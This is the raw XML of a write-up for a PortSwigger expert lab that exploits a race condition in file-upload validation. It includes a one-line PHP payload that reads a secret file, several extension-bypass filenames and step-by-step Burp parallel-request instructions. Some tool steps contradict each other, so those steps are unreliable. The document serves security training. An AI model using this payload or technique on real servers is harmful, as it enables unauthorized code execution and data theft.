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A56A0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Expert Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Race Condition File Upload Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: Neelesh Pandey  |  Platform: PortSwigger Web Security Academy  |  Difficulty: Expert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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Detail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Category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File Upload + Race Condition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Vulnerability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TOCTOU — Time of Check, Time of Use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Tools Used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Burp Suite Professional, Burp Intruder (parallel attack)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Key Technique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Synchronised parallel requests via gate mechanism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Secret Extracted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aBj51Bn1ujvZn3o1ZiM2SJq2reLJETLX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab demonstrates a sophisticated attack combining file upload validation bypass with race condition exploitation. The server correctly validates uploaded files and deletes malicious ones — but a narrow execution window between upload and deletion can be exploited to execute arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This is not a simple upload bypass. The validation works correctly. The vulnerability exists purely in the timing between save and delete — a classic TOCTOU (Time-of-Check Time-of-Use) race condition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. CORE CONCEPT — WHY THIS WORKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Most file upload labs involve tricking the server's validation. This lab is different. The attack exploits the execution order:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: File is uploaded and temporarily saved to disk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Server validates the file content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: If invalid, the file is deleted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Between steps 1 and 3, a tiny window exists where the file is on disk and executable. A GET request hitting the file during this window — before deletion — will execute the PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. WHY STANDARD BYPASSES FAILED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before reaching the race condition approach, all standard bypass techniques were attempted:</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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reason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Content-Type: image/jpeg with PHP payload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Blocked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Server validated file content, not just header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Double extension (exploit.php.jpg)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Blocked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Server parsed the real extension correctly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Null byte injection (exploit.php%00.jpg)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Blocked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Modern server, not vulnerable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Polyglot JPEG + PHP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Blocked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Server stripped executable content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">When ALL standard bypasses fail, the attack surface is likely timing — not the validation logic itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. RECONNAISSANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Normal Upload Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Logged in and uploaded a legitimate avatar image. Intercepted in Burp Proxy. Key observation: uploaded files are served from /files/avatars/&lt;filename&gt; — meaning a PHP file existing there, even briefly, would be executed by the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Malicious Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Created exploit.php containing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php echo file_get_contents('/home/carlos/secret'); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This reads and outputs the contents of Carlos's secret file when executed server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. EXPLOITATION — TURBO INTRUDER RACE CONDITION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Requests Captured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Two requests captured in Burp Proxy &gt; HTTP History:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /my-account/avatar — upload request with exploit.php as the avatar file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /files/avatars/exploit.php — fetch request to trigger PHP execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Burp Intruder — Parallel Attack Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sent the POST upload request and GET fetch request to Burp Intruder. Configured Intruder to send requests in parallel using the Pitchfork attack type with the number of threads set to maximum. The POST request was duplicated once and the GET request was duplicated 4 times — giving 1 POST and 5 GETs firing as close to simultaneously as possible:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Send POST /my-account/avatar to Burp Intruder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Send GET /files/avatars/exploit.php to Burp Repeater x4 (duplicate tab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: In Intruder → Positions → Attack type: Sniper, no payload markers needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Resource pool → Maximum concurrent requests → set to 1 POST + 4 GET tabs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: Select all GET tabs in Repeater → Send group in parallel (Ctrl+Alt+R)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: Simultaneously trigger the POST from Intruder → race window opens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7: One of the parallel GET requests returns 200 with Carlos's secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">def handleResponse(req, interesting):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    table.add(req)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the attack, responses showed mixed results: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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Result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POST /my-account/avatar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File uploaded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 /files/avatars/exploit.php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404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Deleted before request hit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 /files/avatars/exploit.php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404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Deleted before request hit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 /files/avatars/exploit.php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SECRET RETURNED — race window hit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 /files/avatars/exploit.php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404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Deleted before request hit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 /files/avatars/exploit.php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404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Deleted before request hit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Secret extracted: aBj51Bn1ujvZn3o1ZiM2SJq2reLJETLX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6. KEY TAKEAWAYS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Race conditions exist in validation logic — any server that temporarily stores a file before validating it is potentially vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A bypass does not always mean fooling the filter — the filter worked correctly here; the vulnerability was in the timing gap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Intruder's parallel sending with grouped Repeater tabs enables race condition attacks — standard sequential requests are too slow to hit the window</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack is probabilistic — not all GETs succeed; one in five hit the window here</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TOCTOU applies beyond file upload — password resets, 2FA windows, coupon redemption all potentially vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
